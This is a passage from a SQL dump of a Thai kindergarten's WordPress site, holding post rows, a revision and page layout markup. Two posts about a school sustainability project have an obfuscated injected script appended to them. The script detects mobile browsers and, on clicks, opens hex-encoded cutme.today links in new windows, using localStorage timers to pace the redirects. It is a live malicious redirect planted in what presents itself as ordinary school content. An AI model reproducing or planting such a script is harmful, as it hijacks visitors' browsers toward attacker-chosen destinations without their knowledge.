_0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโต','','publish','open','open','','%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%8a%e0%b8%b5%e0%b8%a7%e0%b8%a7%e0%b8%b4%e0%b8%96%e0%b8%b5%e0%b9%80%e0%b8%9e%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%81%e0%b8%b2%e0%b8%a3-2','','','2024-09-12 13:53:00','2024-09-12 06:53:00','',0,'http://watprato.ssk.in.th/?p=388',0,'post','',0),
(389,2,'2024-09-12 13:48:24','2024-09-12 06:48:24','','458265014_122175356336202781_4190648388646234065_n','','inherit','open','closed','','458265014_122175356336202781_4190648388646234065_n','','','2024-09-12 13:48:24','2024-09-12 06:48:24','',388,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/458265014_122175356336202781_4190648388646234065_n.jpg',0,'attachment','image/jpeg',0),
(390,2,'2024-09-12 13:48:39','2024-09-12 06:48:39','<!-- wp:generateblocks/image {\"uniqueId\":\"b202dfb0\",\"mediaId\":389,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-b202dfb0\"><img class=\"gb-image gb-image-b202dfb0\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458265014_122175356336202781_4190648388646234065_n.jpg\" alt=\"\" title=\"458265014_122175356336202781_4190648388646234065_n\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโต','','inherit','closed','closed','','388-revision-v1','','','2024-09-12 13:48:39','2024-09-12 06:48:39','',388,'http://watprato.ssk.in.th/?p=390',0,'revision','',0),
(393,2,'2024-09-16 09:25:58','2024-09-16 02:25:58','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":5,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a 